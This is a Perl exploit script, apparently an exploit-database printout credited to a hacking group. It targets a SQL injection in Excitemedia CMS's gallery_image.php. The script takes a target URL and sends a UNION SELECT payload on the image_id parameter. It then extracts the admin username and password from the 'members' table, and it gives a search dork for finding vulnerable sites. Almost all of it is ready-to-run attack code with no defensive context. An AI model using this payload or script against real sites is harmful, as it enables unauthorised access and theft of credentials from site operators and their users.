1 #!/usr/bin/perl −w 2 3 # Excitemedia CMS Sql injection vulnerability # 4 ######################################## 5 #[+] Author : Dr.0rYX AND Cr3W−DZ 6 #[+] Greetz : HIS0K4 − claw and all the other friends 7 #[+] inurl:M−^Tgallery_image.php?image_id=M−^T 8 #[+] Vendor: http://www.excitemedia.com.au 9 #[+] sell script with host 10 ######################################## 11 print "\t\t| NORTH−AFRICA SECURITY TEAM |\n\n"; 12 print "[x] Dr.0rYX AND Cr3W−DZ\n\n"; 13 print "[x] N.A.S.T\n\n"; 14 print "[x] Excitemedia Cms Sql injection vulnerability\n\n"; 15 print "[x] www.nasteam.wordpress.com\n\n"; 16 print "\t\t| vx3[at]hotmail.de |\n\n"; 17 print "\t\t| cr3w[at]hotmail.de |\n\n"; 18 use LWP::UserAgent; 19 print "\nTarget page:[http://site/path/]: "; 20 chomp(my $target=<STDIN>); 21 $column_name="concat(0x757365723d,username,0x3a,0x70617373776f72643d,password)"; 22 $table_name="members"; 23 $b = LWP::UserAgent−>new() or die "Could not initialize browser\n"; 24 $b−>agent(’Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)’); 25 $host = $target."/gallery_image.php?image_id=1 and 1=0 union select 1,2,".$column_name.",4,5,6,7,8 from ".$table_name." 26 27 limit 0,1−−"; 28 $res = $b−>request(HTTP::Request−>new(GET=>$host)); 29 $answer = $res−>content; if ($answer =~ /user=(.*?):/){ 30 print "\n[+] Admin username : $1\n\n"; 31 } 32 else{print "\nError\n"; 33 } 34 $answer = $res−>content; if ($answer =~ /password=(.*?)<\/div>/){ 35 print "\n[+] Admin password : $1\n\n"; 36 } 37 else{print "\nError\n"; 38 } Page 1/1 Excitemedia CMS SQL Injection Vulnerability Dr.0rYX AND Cr3W−DZ 04/23/2010